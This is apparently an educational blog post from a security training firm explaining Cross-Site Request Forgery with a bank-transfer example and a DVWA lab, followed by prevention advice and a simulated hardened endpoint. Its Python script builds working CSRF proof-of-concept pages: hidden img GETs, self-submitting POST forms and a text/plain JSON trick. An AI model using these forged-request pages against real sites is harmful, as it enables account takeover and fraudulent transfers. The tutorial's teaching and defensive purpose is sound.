
Cross-Site Request Forgery (CSRF) | Web App Vulnerability

Cross-Site Request Forgery, also known as CSRF, XSRF, sea surf, session riding or the one-click attack, is another common web application vulnerability. It tricks the user’s web browser into sending requests the user never intended to make.

The attacker tricks the victim’s browser into generating requests to a website that then performs actions on behalf of the logged-in user. It is a type of malicious exploit in which unauthorized commands are submitted from a user whom the web application trusts.

In short, CSRF is an attack that forces an authenticated user’s browser to send a request the attacker chose, carrying the user’s own credentials (typically the session cookie), so the server cannot tell it apart from a request the user made on purpose.

CSRF can take many forms, but the primary types, classified by the kind of request the attacker forges, are

  1. POST request based
  2. GET request based
  3. JSON request based

How does CSRF work?

Let’s see how a CSRF attack works in the web browser.

Consider a bank web application that transfers money to other users, identified by their usernames.

Suppose the following URL makes the request that transfers the funds to another account:

http://indiabank.com/transfer.do?acc=personA&amount=100

The attacker only needs to change the parameters so that the money goes to their own account. The URL then looks like this:

http://indiabank.com/transfer.do?acc=attacker&amount=100

Now the attacker wraps that URL in a link and uses some social engineering to get you to click on it.

For example:

<a href="http://indiabank.com/transfer.do?acc=attacker&amount=100">Please click me!</a>

If a victim who is currently logged in to indiabank.com clicks on “Please click me!”, their browser sends the request with their session cookie attached and ends up initiating a 100 dollar transfer to the attacker’s account. The bank cannot distinguish this request from one the user made on purpose, because it carries the same cookie.

This is a basic example of a cross-site request forgery attack.

Let’s do a quick CSRF attack using DVWA (Damn Vulnerable Web Application), which we also used in the previous blog for the cross-site scripting attack.


This is how the page for testing CSRF looks on DVWA.

Here, we have to change the admin password.

So let’s first do some recon: watch what the URL looks like when we change the password, that is, which GET request the page sends.

As the request shows, the web app changes the password with a GET request, so the new password travels in the URL’s query string where anyone can reproduce it.

So now I, the hacker, will create a malicious website that tricks the admin into changing the password to one I know. Let’s make one.

The hacker now has a decent-looking website, and as soon as the victim loads the page the password changes to whatever the hacker wants.

This is the code of the website. Here you can see an img tag whose src is the malicious link. The browser tries to load the “image”, sends that GET request along with the victim’s DVWA session cookie, and the victim’s password is changed to ‘hacked’. Unlike the link in the bank example, no click is needed.

This is how a basic CSRF attack is performed.
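The bank link above and the DVWA img tag are both GET-based delivery. As an added example (not code from the original post or from DVWA), the following Python script builds proof-of-concept pages for all three request types the post lists: GET via an img tag, POST via a self-submitting form, and JSON via a form with enctype=text/plain. The DVWA-style host, endpoint and parameter names in the demo at the bottom are assumptions, as is the bank URL reused from the post’s example.

```python
"""Build CSRF proof-of-concept pages for the three request types the post
lists: GET, POST and JSON. Added example, not code from the original post or
from DVWA; the DVWA-style URL and field names used in the demo at the bottom
are assumptions."""
import html
import json
from urllib.parse import urlencode


def attr(value) -> str:
    """Escape a value for use inside a double-quoted HTML attribute."""
    return html.escape(str(value), quote=True)


def csrf_get_poc(url: str, params: dict) -> str:
    """GET-based CSRF: the browser fetches the 'image' with the victim's
    cookies attached, so no click is needed (unlike the <a> link in the post).
    The response is never displayed, which is fine: the attacker only needs
    the request to be made."""
    return f'<img src="{attr(url + "?" + urlencode(params))}" alt="" width="0" height="0">'


def csrf_post_poc(url: str, params: dict) -> str:
    """POST-based CSRF: a hidden form that submits itself when the page loads."""
    fields = "\n".join(
        f'  <input type="hidden" name="{attr(k)}" value="{attr(v)}">' for k, v in params.items()
    )
    return (
        f'<form id="csrf" action="{attr(url)}" method="POST">\n{fields}\n</form>\n'
        '<script>document.getElementById("csrf").submit();</script>'
    )


def json_poc_fields(payload: dict) -> tuple:
    """JSON-based CSRF without fetch() (which would trigger a CORS preflight):
    a form with enctype=text/plain sends 'name=value'. Put the JSON minus its
    closing brace in the field name and close it in the value, so the body is
    valid JSON with one junk key ("pad")."""
    name = json.dumps(payload)[:-1] + ', "pad": "'
    value = '"}'
    return name, value


def csrf_json_poc(url: str, payload: dict) -> str:
    """Self-submitting text/plain form carrying the JSON trick above."""
    name, value = json_poc_fields(payload)
    return (
        f'<form id="csrf" action="{attr(url)}" method="POST" enctype="text/plain">\n'
        f'  <input type="hidden" name="{attr(name)}" value="{attr(value)}">\n</form>\n'
        '<script>document.getElementById("csrf").submit();</script>'
    )


def text_plain_body(fields) -> str:
    """What the browser sends for enctype=text/plain: 'name=value' per field,
    each followed by CRLF, with no escaping of quotes or braces."""
    return "".join(f"{k}={v}\r\n" for k, v in fields)


def json_body_as_server_parses(payload: dict) -> dict:
    """Round trip: build the text/plain field pair, render the body the browser
    would send, and parse it the way a server that ignores Content-Type would."""
    return json.loads(text_plain_body([json_poc_fields(payload)]))


if __name__ == "__main__":
    # Assumed DVWA-style password change endpoint and parameters (constructed).
    print(csrf_get_poc("http://dvwa.local/vulnerabilities/csrf/",
                       {"password_new": "hacked", "password_conf": "hacked", "Change": "Change"}))
    # The post's bank example, delivered as a POST and as JSON.
    bank = "http://indiabank.com/transfer.do"
    print(csrf_post_poc(bank, {"acc": "attacker", "amount": "100"}))
    print(csrf_json_poc(bank, {"acc": "attacker", "amount": 100}))
    print(json_body_as_server_parses({"acc": "attacker", "amount": 100}))
```

Two caveats a tester should keep in mind: the JSON variant only works against a server that does not insist on Content-Type: application/json, since a plain form cannot send that header; and the img-based GET only works if the browser still attaches the session cookie to a cross-site subresource load, which a SameSite=Lax or Strict cookie prevents.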

Impact of CSRF

The impact of CSRF can be severe for an individual or an organization. An ordinary user caught by a CSRF attack can lose control of a personal account and the data in it; if the victim is an administrator, a single small CSRF vulnerability in an admin action (such as the password change above) can hand the attacker control of the whole organization’s application.

How to Prevent CSRF?

  1. Always use an anti-CSRF token: a random, unguessable value bound to the user’s session, embedded in every state-changing form and verified on the server. Never put it in a GET URL, where it leaks through logs and the Referer header, and never perform state changes over GET at all.
  2. Set the SameSite attribute (Lax or Strict) on the session cookie so the browser does not attach it to cross-site requests; as an additional check, verify the Origin header on state-changing requests.
  3. Require re-authentication (the current password or a second factor) for sensitive actions such as password changes and money transfers.
  4. Always be aware of new types of attacks and forgery.
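The prevention list above, as an added example in Python (not code from the original post): a simulated version of the bank’s transfer.do endpoint, first as the post describes it, then hardened with a synchronizer token, a POST-only rule and an Origin check, plus a simplified model of how a SameSite cookie changes what the browser attaches to a forged request. The Request and Session classes stand in for a web framework; the origin https://indiabank.com (taken from the post’s example host), the attacker site evil.example, the session id and the balances are all constructed.

```python
"""Simulated bank 'transfer.do' endpoint, first as the post describes it and
then with the server-side defenses from the prevention list. Added example,
not code from the original post; Request/Session stand in for a web
framework, and the session id, attacker origin and balances are constructed."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://indiabank.com"  # assumed origin, using the post's example host


@dataclass
class Session:
    user: str
    balance: int = 1000
    # Synchronizer token: random, bound to this session, never placed in a URL.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    cookies: dict   # cookies the browser actually attached (after SameSite rules)
    headers: dict
    params: dict    # query string for GET, form body for POST


def vulnerable_transfer(req, sessions):
    """The post's transfer.do: accepts GET and trusts the session cookie alone,
    so any request that carries the victim's cookie is treated as the victim."""
    session = sessions.get(req.cookies.get("sid"))
    if session is None:
        return "not logged in"
    session.balance -= int(req.params["amount"])
    return f"sent {req.params['amount']} to {req.params['acc']}"


def hardened_transfer(req, sessions):
    """Same action with three server-side checks: state changes only over POST,
    the Origin (or Referer) must be this site, and the form must carry the
    token issued to this session. A cross-site page cannot read that token."""
    session = sessions.get(req.cookies.get("sid"))
    if session is None:
        return "not logged in"
    if req.method != "POST":
        return "rejected: state change over GET"
    o = urlsplit(req.headers.get("Origin") or req.headers.get("Referer", ""))
    if f"{o.scheme}://{o.netloc}" != SITE_ORIGIN:
        return "rejected: cross-site origin"
    submitted = req.params.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(submitted, session.csrf_token):
        return "rejected: bad csrf token"
    session.balance -= int(req.params["amount"])
    return f"sent {req.params['amount']} to {req.params['acc']}"


def browser_attaches_cookie(samesite, cross_site, method):
    """Simplified model of the browser's SameSite rule for the session cookie.
    Lax still sends it on a cross-site top-level GET navigation (the post's
    'Please click me!' link), which is why GET must never change state; an
    <img> load is a subresource and would not get the cookie under Lax."""
    if samesite == "None":
        return True
    if samesite == "Lax":
        return (not cross_site) or method == "GET"
    return not cross_site  # Strict


def run_scenario(handler, samesite, forged, method="POST"):
    """Log a victim in, then send either the victim's own transfer or the
    attacker's forged one; return the handler's answer and the balance left."""
    sessions = {"s3cr3t-sid": Session(user="victim")}  # constructed session id
    session = sessions["s3cr3t-sid"]
    cookies = {"sid": "s3cr3t-sid"} if browser_attaches_cookie(samesite, forged, method) else {}
    if forged:
        headers = {"Origin": "https://evil.example"}    # constructed attacker site
        params = {"acc": "attacker", "amount": "100"}   # no token: attacker cannot read it
    else:
        headers = {"Origin": SITE_ORIGIN}
        params = {"acc": "personA", "amount": "100", "csrf_token": session.csrf_token}
    result = handler(Request(method, cookies, headers, params), sessions)
    return result, session.balance


if __name__ == "__main__":
    for samesite in ("None", "Lax", "Strict"):
        for handler in (vulnerable_transfer, hardened_transfer):
            print(samesite, handler.__name__, "forged GET :", run_scenario(handler, samesite, True, "GET"))
            print(samesite, handler.__name__, "forged POST:", run_scenario(handler, samesite, True))
    print("legit POST:", run_scenario(hardened_transfer, "Lax", False))
```

Running the script shows the layering: with no SameSite protection the vulnerable handler pays the attacker; with SameSite=Lax the forged POST never reaches the handler logged in, but a forged top-level GET still does, and only the POST-only rule and the token check in the hardened handler stop it.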


About Cybervie

Cybervie provides a cyber security training program in Hyderabad, India. The course teaches you to detect vulnerabilities in a system, ward off attacks and manage emergency situations. Taking a proactive approach to security that helps organisations protect their data, Cybervie has designed its training module around cyber security industry requirements, with three levels of training covering both offensive and defensive work and using real-time scenarios, so that students understand the market up to its standard certifications, an added advantage that helps them stand out in a cyber security interview.
